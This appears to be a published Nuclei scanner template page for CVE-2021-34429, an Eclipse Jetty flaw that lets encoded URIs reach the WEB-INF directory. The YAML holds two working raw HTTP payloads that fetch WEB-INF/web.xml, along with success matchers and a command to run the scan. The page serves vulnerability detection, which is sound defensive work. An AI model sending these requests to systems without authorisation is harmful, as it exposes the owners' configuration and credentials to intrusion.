Eclipse Jetty - Information Disclosure

ID: CVE-2021-34429

Severity: medium

Author: bernardofsr,am0nt31r0

Tags: cve2021,cve,jetty,eclipse

Description

Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.

YAML Source

id: CVE-2021-34429

info:
  name: Eclipse Jetty - Information Disclosure
  author: bernardofsr,am0nt31r0
  severity: medium
  description: |
    Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to potential unauthorized access or further attacks.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Eclipse Jetty.
  reference:
    - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
    - https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E
    - https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34429
    - https://lists.apache.org/thread.html/r029c0c6833c8bb6acb094733fd7b75029d633f47a92f1c9d14391fc0@%3Cnotifications.zookeeper.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-34429
    cwe-id: CWE-200,NVD-CWE-Other
    epss-score: 0.45704
    epss-percentile: 0.97324
    cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: eclipse
    product: jetty
    shodan-query: cpe:"cpe:2.3:a:eclipse:jetty"
  tags: cve2021,cve,jetty,eclipse

http:
  - raw:
      - |+
        GET /%u002e/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

      - |+
        GET /.%00/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "java.sun.com"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c957abd997b705121d666fc3e06d8d8705c5480886f4ccdca2df11c22e43bc520220464662b375f56039be2633768859ceb505125f7c2d643cf4054bbc78206982aa:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-34429.yaml"

View on Github